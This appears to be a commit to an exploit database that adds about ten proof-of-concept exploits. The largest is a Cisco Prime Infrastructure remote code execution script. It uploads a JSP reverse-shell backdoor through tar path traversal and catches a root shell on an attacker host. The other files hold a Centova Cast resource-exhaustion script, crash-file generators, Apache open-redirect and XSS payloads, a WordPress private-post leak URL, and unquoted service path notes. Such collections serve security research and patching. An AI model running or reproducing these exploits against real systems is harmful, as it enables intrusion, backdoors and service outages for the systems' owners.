
Commit 72cddae

author
Offensive Security
committed
DB: 2019-11-20
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
1 parent 3e9ff5a commit 72cddae

14 files changed

Lines changed: 611 additions & 0 deletions


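--- a/exploits/hardware/dos/47677.sh
+++ b/exploits/hardware/dos/47677.sh
@@ -0,0 +1,32 @@
+# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
+# Date: 2019-11-18
+# Exploit Author: DroidU
+# Vendor Homepage: https://centova.com
+# Affected Version: <=v3.2.12
+# Tested on: Debian 9, CentOS 7
+# ===============================================
+# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
+
+#!/bin/bash
+if [ "$3" = "" ]
+then
+echo "Usage: $0 centovacast_url reseller/admin password"
+exit
+fi
+url=$1
+reseller=$2
+pass=$3
+
+
+dwn() {
+echo -n .
+curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
+}
+
+for i in {0..32}
+do
+dwn /dev/zero
+sleep .1
+done
+echo "
+Done!"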
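--- a/exploits/ios/dos/47678.py
+++ b/exploits/ios/dos/47678.py
@@ -0,0 +1,24 @@
+# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
+# Software Link: App Store for iOS devices
+# Tested Version: 1.1.4.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 7 iOS 13.2
+
+# Steps to Produce the Crash:
+# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
+# 2.- Copy content to clipboard
+# 3.- Open "scadaApp for iOS"
+# 4.- Let's go
+# 5.- Username > "l4m5"
+# 6.- Password > "l4m5"
+# 7.- Paste ClipBoard on "Servername"
+# 8.- Login
+# 9.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 257
+print (buffer)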
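--- a/exploits/linux/remote/47686.py
+++ b/exploits/linux/remote/47686.py
@@ -0,0 +1,172 @@
+#!/usr/bin/python
+
+"""
+Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
+Steven Seeley (mr_me) of Source Incite - 2019
+SRC: SRC-2019-0034
+CVE: CVE-2019-1821
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py
+(+) usage: ./poc.py <target> <connectback:port>
+(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
+
+saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
+(+) planted backdoor!
+(+) starting handler on port 4444
+(+) connection from 192.168.100.123
+(+) pop thy shell!
+python -c 'import pty; pty.spawn("/bin/bash")'
+[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
+/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
+sh-4.1# /usr/bin/id
+/usr/bin/id
+uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
+sh-4.1# exit
+exit
+exit
+[prime@piconsole CSCOlumos]$ exit
+exit
+exit
+"""
+
+import sys
+import socket
+import requests
+import tarfile
+import telnetlib
+from threading import Thread
+from cStringIO import StringIO
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _build_tar(ls, lp):
+    """
+    build the tar archive without touching disk
+    """
+    f = StringIO()
+    b = _get_jsp(ls, lp)
+    t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
+    t.size = len(b)
+    with tarfile.open(fileobj=f, mode="w") as tar:
+        tar.addfile(t, StringIO(b))
+    return f.getvalue()
+
+def _get_jsp(ls, lp):
+    jsp = """<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+<%
+class StreamConnector extends Thread
+{
+InputStream sv;
+OutputStream tp;
+StreamConnector( InputStream sv, OutputStream tp )
+{
+this.sv = sv;
+this.tp = tp;
+}
+public void run()
+{
+BufferedReader za = null;
+BufferedWriter hjr = null;
+try
+{
+za = new BufferedReader( new InputStreamReader( this.sv ) );
+hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
+char buffer[] = new char[8192];
+int length;
+while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
+{
+hjr.write( buffer, 0, length );
+hjr.flush();
+}
+} catch( Exception e ){}
+try
+{
+if( za != null )
+za.close();
+if( hjr != null )
+hjr.close();
+} catch( Exception e ){}
+}
+}
+try
+{
+String ShellPath = new String("/bin/sh");
+Socket socket = new Socket("__IP__", __PORT__);
+Process process = Runtime.getRuntime().exec( ShellPath );
+( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+} catch( Exception e ) {}
+%>"""
+    return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))
+
+def handler(lp):
+    """
+    This is the client handler, to catch the connectback
+    """
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp):
+    """
+    This function threads the client handler and sends off the attacking payload
+    """
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    r = requests.get("https://%s/si.jsp" % t, verify=False)
+
+def we_can_upload(t, ls, lp):
+    """
+    This is where we take advantage of the vulnerability
+    """
+    td = _build_tar(ls, lp)
+    bd = {'files': ('si.tar', td)}
+    h = {
+        'Destination-Dir': 'tftpRoot',
+        'Compressed-Archive': "false",
+        'Primary-IP' : '127.0.0.1',
+        'Filecount' : "1",
+        'Filename': "si.tar",
+        'Filesize' : str(len(td)),
+    }
+    r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def main():
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]
+        sys.exit(-1)
+    t = sys.argv[1]
+    cb = sys.argv[2]
+    if not ":" in cb:
+        print "(+) using default connectback port 4444"
+        ls = cb
+        lp = 4444
+    else:
+        if not cb.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = cb.split(":")[0]
+        lp = int(cb.split(":")[1])
+    if we_can_upload(t, ls, lp):
+        print "(+) planted backdoor!"
+        exec_code(t, lp)
+
+if __name__ == '__main__':
+    main()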
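--- a/exploits/multiple/webapps/47688.md
+++ b/exploits/multiple/webapps/47688.md
@@ -0,0 +1,14 @@
+The trick is to use a vertical tab (`%09`) and then place another URL in the tag. So once a victim clicks the link on the error page, she will go somewhere else.
+
+As you can see, the browser changes the destination from relative / to an absolute url https://enoflag.de. The exploit is `http://domain.tld/%09//otherdomain.tld`
+
+Here's the httpd configuration to reproduce the behavior:
+
+```
+<Location />
+ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
+ProxyPassReverse http://127.0.0.1:9000/
+Order allow,deny
+Allow from all
+</Location>
+```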
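--- a/exploits/multiple/webapps/47689.md
+++ b/exploits/multiple/webapps/47689.md
@@ -0,0 +1,9 @@
+Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
+
+```
+curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
+HTTP/2 302
+date: Mon, 28 Oct 2019 03:36:58 GMT
+content-type: text/html; charset=iso-8859-1
+location: https://redirect.local.evilwebsite.com
+```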
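--- a/exploits/multiple/webapps/47690.md
+++ b/exploits/multiple/webapps/47690.md
@@ -0,0 +1,10 @@
+So far we know that adding `?static=1` to a wordpress URL should leak its secret content
+
+Here are a few ways to manipulate the returned entries:
+
+- `order` with `asc` or `desc`
+- `orderby`
+- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
+
+
+In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content: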
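--- a/exploits/windows/dos/47674.py
+++ b/exploits/windows/dos/47674.py
@@ -0,0 +1,24 @@
+# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
+# Discovery by: Diego Buztamante
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
+# Software Link : http://download.netscantools.com/ipls192.zip
+# Tested Version: 1.92
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python ipPulse_1.92.py
+# 2.- Open ipPulse_1.92.txt and copy content to clipboard
+# 3.- Open ippulse.exe
+# 4.- Click on "Enter Key"
+# 5.- Paste ClipBoard on "Name: "
+# 6.- OK
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 256
+f = open ("ipPulse_1.92.txt", "w")
+f.write(buffer)
+f.close()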
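--- a/exploits/windows/dos/47679.py
+++ b/exploits/windows/dos/47679.py
@@ -0,0 +1,30 @@
+#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-18
+#Vendor Homepage : https://www.xmedia-recode.de/
+#Link Software : https://www.xmedia-recode.de/download.php
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+#contact: msk4@live.fr
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install XMedia Recode
+2.Run the python operating script that will create a file (poc.m3u)
+3.Run the software "File -> Open File -> Add the file (.m3u) "
+4.XMedia Recode Crashed
+'''
+
+#!/usr/bin/python
+
+http = "http://"
+buffer = "\x41" * 500
+
+poc = http + buffer
+file = open("poc.m3u,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"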
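--- a/exploits/windows/local/47675.txt
+++ b/exploits/windows/local/47675.txt
@@ -0,0 +1,25 @@
+#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-18
+#Vendor Homepage : https://www.filehorse.com/
+#Link Software : https://www.filehorse.com/download-bartvpn/
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc BartVPNService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: BartVPNService
+TYPE : 110 WIN32_OWN_PROCESS (interactive)
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : BartVPNService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem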
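--- a/exploits/windows/local/47676.txt
+++ b/exploits/windows/local/47676.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-11-18
+# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
+# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
+# Rockwell Automation Technologies
+# Tested Version: 30.01.00
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """
+
+FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto
+
+# Service info:
+
+C:\>sc qc "FactoryTalk Activation Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FactoryTalk Activation Service
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : FactoryTalk Activation Service
+DEPENDENCIES : winmgmt
+: wmiapsrv
+: +NetworkProvider
+SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.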